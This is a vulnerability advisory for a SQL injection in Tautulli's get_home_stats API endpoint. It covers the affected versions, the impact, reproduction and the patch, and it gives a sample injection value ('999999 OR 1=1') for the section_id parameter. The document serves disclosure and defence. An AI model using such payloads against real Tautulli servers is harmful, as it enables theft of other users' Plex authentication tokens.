Tautulli SQL Injection Vulnerability in Home Stats API Endpoint

A SQL injection vulnerability has been identified in Tautulli, a monitoring tool for Plex Media Server, affecting versions 2.14.2 prior to 2.17.0, and versions 2.1.0-beta prior to 2.17.0. The vulnerability arises in the '/api/v2?cmd=get_home_stats' endpoint, where the 'section_id', 'user_id', 'before', and 'after' query parameters are passed directly into SQL queries via Python '%'-string formatting, without proper parameterization. This flaw allows an attacker with a Tautulli admin API key to inject arbitrary SQL and exfiltrate data from the Tautulli SQLite database using boolean-blind inference.

Impact

Exploitation of this vulnerability allows for arbitrary SQL injection, enabling an attacker to extract any value from the Tautulli SQLite database through boolean-blind inference. While the vulnerability requires a valid admin API key, which grants full access to Tautulli's UI and OS-level command execution capabilities, the primary risk lies in the potential exfiltration of Plex authentication tokens for other users, a process that may be less detectable than direct UI access.

Reproduction

To reproduce this vulnerability, send a request to the '/api/v2?cmd=get_home_stats' endpoint with the 'section_id' or 'user_id' parameters. The injection can be tested by including a crafted 'section_id' value that exploits the SQL injection vulnerability, such as '999999 OR 1=1', which would return data by bypassing the SQL query's boolean logic. This vulnerability can also be verified by injecting a malformed token that triggers a SQL syntax error, demonstrating the injection capability.

Remediation

Users are advised to update Tautulli to version 2.17.0, where this vulnerability has been patched.